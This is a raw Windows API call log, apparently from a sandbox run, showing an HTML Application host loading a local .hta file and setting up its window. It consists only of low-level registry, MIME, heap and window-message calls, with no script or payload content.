[0080.328] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x1533f8 | out: pdwScheme=0x1533f8*=0x9) returned 0x0
[0080.328] IMoniker:IsSystemMoniker (in: This=0x13a4d0, pdwMksys=0x39f450 | out: pdwMksys=0x39f450*=0x6) returned 0x0
[0080.328] CoInternetParseIUri (in: pIUri=0x13be24, ParseAction=0x9, dwFlags=0x0, pwzResult=0x39f460, cchResult=0x104, pcchResult=0x39f404, dwReserved=0x0 | out: pwzResult="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", pcchResult=0x39f404) returned 0x0
[0080.328] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x5c) returned 0x151098
[0080.329] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", lpFindFileData=0x39f190 | out: lpFindFileData=0x39f190*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f882e0, ftCreationTime.dwHighDateTime=0x1d7fe3c, ftLastAccessTime.dwLowDateTime=0x85f882e0, ftLastAccessTime.dwHighDateTime=0x1d7fe3c, ftLastWriteTime.dwLowDateTime=0x86281e60, ftLastWriteTime.dwHighDateTime=0x1d7fe3c, nFileSizeHigh=0x0, nFileSizeLow=0xfdc, dwReserved0=0x69005c, dwReserved1=0x470037, cFileName="i7Gigabyte.hta", cAlternateFileName="I7GIGA~1.HTA")) returned 0x14f338
[0080.329] FindClose (in: hFindFile=0x14f338 | out: hFindFile=0x14f338) returned 1
[0080.329] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f3f4 | out: ppvObject=0x39f3f4*=0x13be24) returned 0x0
[0080.329] IUnknown:Release (This=0x13be24) returned 0x11
[0080.329] IUnknown:AddRef (This=0x13be24) returned 0x12
[0080.329] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x150698
[0080.329] IInternetSession:CreateBinding (in: This=0x1467f8, pbc=0x0, szUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x1506a0, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x1506a0*=0x153968) returned 0x0
[0080.331] IUnknown:QueryInterface (in: This=0x153968, riid=0x739c6078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x39f378 | out: ppvObject=0x39f378*=0x0) returned 0x80004002
[0080.331] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f314 | out: phkResult=0x39f314*=0x1b8) returned 0x0
[0080.331] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f318 | out: phkResult=0x39f318*=0x1c0) returned 0x0
[0080.331] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x39f2d4 | out: phkResult=0x39f2d4*=0x0) returned 0x2
[0080.331] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x39f2d4 | out: phkResult=0x39f2d4*=0x1c4) returned 0x0
[0080.332] SHRegGetValueW () returned 0x2
[0080.332] SHRegGetValueW () returned 0x2
[0080.332] RegCloseKey (hKey=0x1c4) returned 0x0
[0080.332] RegCloseKey (hKey=0x0) returned 0x6
[0080.332] RegCloseKey (hKey=0x0) returned 0x6
[0080.332] RegCloseKey (hKey=0x1b8) returned 0x0
[0080.332] RegCloseKey (hKey=0x1c0) returned 0x0
[0080.332] IUnknown:AddRef (This=0x153968) returned 0x2
[0080.332] IUnknown:QueryInterface (in: This=0x153968, riid=0x739c6158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x39f3bc | out: ppvObject=0x39f3bc*=0x153968) returned 0x0
[0080.332] IInternetProtocolEx:StartEx (This=0x153968, pUri=0x13be24, pOIProtSink=0x153344, pOIBindInfo=0x15330c, grfPI=0x10, dwReserved=0x0) returned 0x0
[0080.332] IUnknown:AddRef (This=0x153344) returned 0x3
[0080.332] IUnknown:AddRef (This=0x15330c) returned 0x4
[0080.332] IUnknown:QueryInterface (in: This=0x15330c, riid=0x75a96f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x39f364 | out: ppvObject=0x39f364*=0x0) returned 0x80004002
[0080.333] IInternetBindInfo:GetBindInfo (in: This=0x15330c, grfBINDF=0x153ad8, pbindinfo=0x153ae0 | out: grfBINDF=0x153ad8*=0x20083, pbindinfo=0x153ae0) returned 0x0
[0080.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f2c0 | out: phkResult=0x39f2c0*=0x1c0) returned 0x0
[0080.333] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f2c4 | out: phkResult=0x39f2c4*=0x1b8) returned 0x0
[0080.333] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x39f280 | out: phkResult=0x39f280*=0x0) returned 0x2
[0080.333] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x39f280 | out: phkResult=0x39f280*=0x0) returned 0x2
[0080.333] RegCloseKey (hKey=0x0) returned 0x6
[0080.333] RegCloseKey (hKey=0x0) returned 0x6
[0080.333] RegCloseKey (hKey=0x1c0) returned 0x0
[0080.333] RegCloseKey (hKey=0x1b8) returned 0x0
[0080.333] IUnknown:AddRef (This=0x153344) returned 0x5
[0080.334] IInternetProtocolSink:ReportProgress (This=0x153344, ulStatusCode=0xb, szStatusText="") returned 0x0
[0080.334] IInternetProtocolSink:ReportProgress (This=0x153344, ulStatusCode=0xe, szStatusText="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0080.334] GetCurrentProcessId () returned 0xe80
[0080.335] IInternetProtocolSink:ReportProgress (This=0x153344, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0
[0080.335] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc14f
[0080.335] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc150
[0080.335] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc173
[0080.335] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc14b
[0080.335] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc149
[0080.336] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc14c
[0080.336] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc15d
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc15e
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc15f
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc161
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc160
[0080.336] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc163
[0080.336] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc164
[0080.336] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc165
[0080.336] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc174
[0080.336] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc175
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc15b
[0080.336] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc15c
[0080.336] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc162
[0080.336] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19
[0080.336] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0080.336] IInternetProtocolSink:ReportData (This=0x153344, grfBSCF=0x5, ulProgress=0xfdc, ulProgressMax=0xfdc) returned 0x0
[0080.337] IUnknown:QueryInterface (in: This=0x153968, riid=0x739e9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39d88c | out: ppvObject=0x39d88c*=0x0) returned 0x80004002
[0080.337] IUnknown:QueryInterface (in: This=0x153968, riid=0x73964588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39d884 | out: ppvObject=0x39d884*=0x0) returned 0x80004002
[0080.337] IInternetProtocolSink:ReportResult (This=0x153344, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0080.337] IUnknown:Release (This=0x153968) returned 0x2
[0080.337] IUnknown:Release (This=0x13be24) returned 0x13
[0080.337] IUnknown:Release (This=0x13be24) returned 0x12
[0080.337] IUnknown:Release (This=0x13be24) returned 0x11
[0080.337] CoTaskMemFree (pv=0x0)
[0080.337] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1a8) returned 0x1534a8
[0080.338] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x39f6a8 | out: lpCPInfo=0x39f6a8) returned 1
[0080.338] IUnknown:AddRef (This=0x1467f8) returned 0x3
[0080.338] IUnknown:AddRef (This=0x13be24) returned 0x12
[0080.338] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f6b0 | out: ppvObject=0x39f6b0*=0x13be24) returned 0x0
[0080.338] IUnknown:Release (This=0x13be24) returned 0x12
[0080.338] IUnknown:AddRef (This=0x13be24) returned 0x13
[0080.338] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x39f6b4 | out: pdwScheme=0x39f6b4*=0x9) returned 0x0
[0080.338] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x58) returned 0x153658
[0080.338] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1b8
[0080.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7399e718, lpParameter=0x153658, dwCreationFlags=0x0, lpThreadId=0x15366c | out: lpThreadId=0x15366c*=0xe94) returned 0x138
[0080.340] GetCurrentThreadId () returned 0xe84
[0080.340] GetCurrentThreadId () returned 0xe84
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x68) returned 0x154550
[0080.341] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.341] MulDiv (nNumber=4060, nNumerator=4000, nDenominator=4060) returned 4000
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6c) returned 0x155458
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x128) returned 0x1554d0
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x124af8
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x5c) returned 0x151100
[0080.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x100) returned 0x155600
[0080.342] IInternetProtocol:Read (in: This=0x153968, pv=0x15560c, cb=0xc8, pcbRead=0x39f5f8 | out: pv=0x15560c, pcbRead=0x39f5f8*=0xc8) returned 0x0
[0080.342] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pSecMgr=0x0) returned 0x1
[0080.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f580 | out: phkResult=0x39f580*=0x158) returned 0x0
[0080.343] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f584 | out: phkResult=0x39f584*=0x1cc) returned 0x0
[0080.343] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x39f540 | out: phkResult=0x39f540*=0x0) returned 0x2
[0080.343] RegOpenKeyExW (in: hKey=0x158, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x39f540 | out: phkResult=0x39f540*=0x0) returned 0x2
[0080.343] RegCloseKey (hKey=0x0) returned 0x6
[0080.343] RegCloseKey (hKey=0x0) returned 0x6
[0080.343] RegCloseKey (hKey=0x158) returned 0x0
[0080.343] RegCloseKey (hKey=0x1cc) returned 0x0
[0080.343] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", pBuffer=0x39f620, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x39f5d8, dwReserved=0x0 | out: ppwzMimeOut=0x39f5d8*="text/html") returned 0x0
[0080.358] CoTaskMemFree (pv=0x133bf8)
[0080.358] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pSecMgr=0x0) returned 0x1
[0080.358] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1
[0080.358] GetCurrentThreadId () returned 0xe84
[0080.358] SetEvent (hEvent=0x1b8) returned 1
[0080.378] GetCurrentThreadId () returned 0xe84
[0080.379] GetCurrentThreadId () returned 0xe84
[0080.379] SetEvent (hEvent=0x1b8) returned 1
[0080.381] IUnknown:Release (This=0x13be24) returned 0x14
[0080.381] IUnknown:Release (This=0x13c334) returned 0x1
[0080.381] IUnknown:Release (This=0x13a4d0) returned 0x3
[0080.381] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.381] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.381] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.381] IUnknown:Release (This=0x13be24) returned 0x13
[0080.381] IUnknown:Release (This=0x13be24) returned 0x12
[0080.381] IUnknown:Release (This=0x13be24) returned 0x11
[0080.381] IUnknown:Release (This=0x13a4d0) returned 0x2
[0080.381] IUnknown:Release (This=0x13be24) returned 0x10
[0080.381] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.381] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.381] CoTaskMemFree (pv=0x1509c8)
[0080.382] CoTaskMemFree (pv=0x0)
[0080.382] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.382] IUnknown:Release (This=0x13be24) returned 0xf
[0080.382] CoTaskMemFree (pv=0x150958)
[0080.382] GetClientRect (in: hWnd=0x20314, lpRect=0x39fbcc | out: lpRect=0x39fbcc) returned 1
[0080.382] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x78) returned 0x121bd0
[0080.382] GetClientRect (in: hWnd=0x20314, lpRect=0x121bfc | out: lpRect=0x121bfc) returned 1
[0080.382] OffsetRect (in: lprc=0x121bfc, dx=0, dy=0 | out: lprc=0x121bfc) returned 1
[0080.382] OffsetRect (in: lprc=0x121c0c, dx=0, dy=0 | out: lprc=0x121c0c) returned 1
[0080.383] RegisterClassExW (param_1=0x39f6e8) returned 0xc178
[0080.383] CoCreateInstance (in: rclsid=0x739bbf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x739bbf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x73dab020 | out: ppv=0x73dab020*=0x144f30) returned 0x0
[0080.579] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x144f30, aaClassList=0x39f7e0*=0xc178, uSize=0x1) returned 0x0
[0080.579] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc178, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x20314, hMenu=0x0, hInstance=0x73870000, lpParam=0x141a90) returned 0x1034a
[0080.580] GetWindowLongW (hWnd=0x1034a, nIndex=-20) returned 0
[0080.580] SetWindowLongW (hWnd=0x1034a, nIndex=-21, dwNewLong=1317520) returned 0
[0080.580] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x81, wParam=0x0, lParam=0x39f3b4*=1317520, plResult=0x39f22c | out: plResult=0x39f22c) returned 0x1
[0080.580] NtdllDefWindowProc_W () returned 0x1
[0080.580] GetCurrentThreadId () returned 0xe84
[0080.580] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.580] GetCurrentThreadId () returned 0xe84
[0080.580] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.580] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x1, wParam=0x0, lParam=0x39f3b4*=1317520, plResult=0x39f22c | out: plResult=0x39f22c) returned 0x1
[0080.580] NtdllDefWindowProc_W () returned 0x0
[0080.580] GetCurrentThreadId () returned 0xe84
[0080.580] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.580] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x39f278 | out: plResult=0x39f278) returned 0x1
[0080.580] NtdllDefWindowProc_W () returned 0x0
[0080.580] GetCurrentThreadId () returned 0xe84
[0080.580] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.580] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x39f278 | out: plResult=0x39f278) returned 0x1
[0080.580] NtdllDefWindowProc_W () returned 0x0
[0080.580] GetCurrentThreadId () returned 0xe84
[0080.581] NtdllDefWindowProc_W () returned 0x0
[0080.581] GetClassNameW (in: hWnd=0x20314, lpClassName=0x39f7e8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0080.581] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1
[0080.581] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x144f30, fRestoreLayout=1) returned 0x0
[0080.581] SendMessageW (hWnd=0x1034a, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0080.581] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.581] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x39f69c | out: plResult=0x39f69c) returned 0x1
[0080.581] NtdllDefWindowProc_W () returned 0x3
[0080.581] GetCurrentThreadId () returned 0xe84
[0080.581] IntersectRect (in: lprcDst=0x39fa1c, lprcSrc1=0x121bfc, lprcSrc2=0x121c0c | out: lprcDst=0x39fa1c) returned 1
[0080.581] EqualRect (lprc1=0x39fa1c, lprc2=0x121bfc) returned 1
[0080.581] InvalidateRect (hWnd=0x1034a, lpRect=0x0, bErase=1) returned 1
[0080.581] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xf0) returned 0x162300
[0080.581] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x150) returned 0x162cc8
[0080.581] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x140) returned 0x162e20
[0080.581] IntersectRect (in: lprcDst=0x39f908, lprcSrc1=0x39f908, lprcSrc2=0x39f8a0 | out: lprcDst=0x39f908) returned 1
[0080.582] IntersectRect (in: lprcDst=0x39f908, lprcSrc1=0x39f908, lprcSrc2=0x39f8a0 | out: lprcDst=0x39f908) returned 1
[0080.582] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x151168
[0080.583] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x12d9e8
[0080.583] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xec) returned 0x162f68
[0080.583] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.583] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.583] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12da20
[0080.583] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x162558
[0080.583] GetCurrentThreadId () returned 0xe84
[0080.583] GetCurrentThreadId () returned 0xe84
[0080.583] GetCurrentThreadId () returned 0xe84
[0080.583] IntersectRect (in: lprcDst=0x39f744, lprcSrc1=0x39f744, lprcSrc2=0x39f714 | out: lprcDst=0x39f744) returned 1
[0080.583] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f734 | out: lprcDst=0x162e80) returned 1
[0080.583] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.583] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152638
[0080.584] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152638 | out: hHeap=0x110000) returned 1
[0080.584] SetWindowPos (hWnd=0x1034a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0080.584] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.584] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x46, wParam=0x0, lParam=0x39f9fc*=66378, plResult=0x39f898 | out: plResult=0x39f898) returned 0x1
[0080.584] NtdllDefWindowProc_W () returned 0x0
[0080.584] GetCurrentThreadId () returned 0xe84
[0080.588] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.588] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x47, wParam=0x0, lParam=0x39f9fc*=66378, plResult=0x39f894 | out: plResult=0x39f894) returned 0x1
[0080.588] NtdllDefWindowProc_W () returned 0x0
[0080.588] GetCurrentThreadId () returned 0xe84
[0080.589] SetTimer (hWnd=0x1034a, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0080.589] GetFocus () returned 0x0
[0080.589] EnumChildWindows (hWndParent=0x1034a, lpEnumFunc=0x73b90a73, lParam=0x39f8f4) returned 0
[0080.589] GetFocus () returned 0x0
[0080.589] SetFocus (hWnd=0x1034a) returned 0x0
[0080.589] NtdllDefWindowProc_W () returned 0x0
[0080.589] NtdllDefWindowProc_W () returned 0x0
[0080.593] NtdllDefWindowProc_W () returned 0x0
[0080.593] NtdllDefWindowProc_W () returned 0x0
[0080.593] NtdllDefWindowProc_W () returned 0x0
[0080.593] NtdllDefWindowProc_W () returned 0x1
[0080.594] NtdllDefWindowProc_W () returned 0x0
[0080.595] NtdllDefWindowProc_W () returned 0x0
[0080.600] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.600] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x74790000
[0080.606] GetProcAddress (hModule=0x74790000, lpProcName="LresultFromObject") returned 0x74792663
[0080.606] LresultFromObject () returned 0xc14d
[0080.677] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x163be0
[0080.678] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152728
[0080.689] GetCurrentThreadId () returned 0xe84
[0080.697] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x163be0 | out: hHeap=0x110000) returned 1
[0080.697] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x60) returned 0x151308
[0080.698] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163be0
[0080.698] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x173e50
[0080.698] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151308 | out: hHeap=0x110000) returned 1
[0080.699] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x60) returned 0x151308
[0080.699] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163c00
[0080.699] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x173e98
[0080.700] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151308 | out: hHeap=0x110000) returned 1
[0080.700] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1527b8
[0080.700] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x48) returned 0x167958
[0080.700] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.701] GetMessageTime () returned 0
[0080.701] GetMessagePos () returned 0x0
[0080.701] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x39f2bc | out: plResult=0x39f2bc) returned 0x0
[0080.703] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.703] GetMessageTime () returned 0
[0080.703] GetMessagePos () returned 0x0
[0080.704] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x39ecec | out: plResult=0x39ecec) returned 0x0
[0080.704] GetCurrentThreadId () returned 0xe84
[0080.704] GetCurrentThreadId () returned 0xe84
[0080.704] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.704] GetMessageTime () returned 0
[0080.704] GetMessagePos () returned 0x0
[0080.704] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f470 | out: lpPoint=0x39f470) returned 1
[0080.705] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f470 | out: lpPoint=0x39f470) returned 1
[0080.705] GetCapture () returned 0x0
[0080.705] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166df0
[0080.705] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1527e8
[0080.706] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x16a050
[0080.706] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16a050 | out: hHeap=0x110000) returned 1
[0080.706] GetCurrentThreadId () returned 0xe84
[0080.706] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166df0 | out: hHeap=0x110000) returned 1
[0080.706] GetCurrentThreadId () returned 0xe84
[0080.706] GetCurrentThreadId () returned 0xe84
[0080.706] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x12d908, Size=0x48) returned 0x1679a8
[0080.709] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x39f6ac | out: plResult=0x39f6ac) returned 0x1
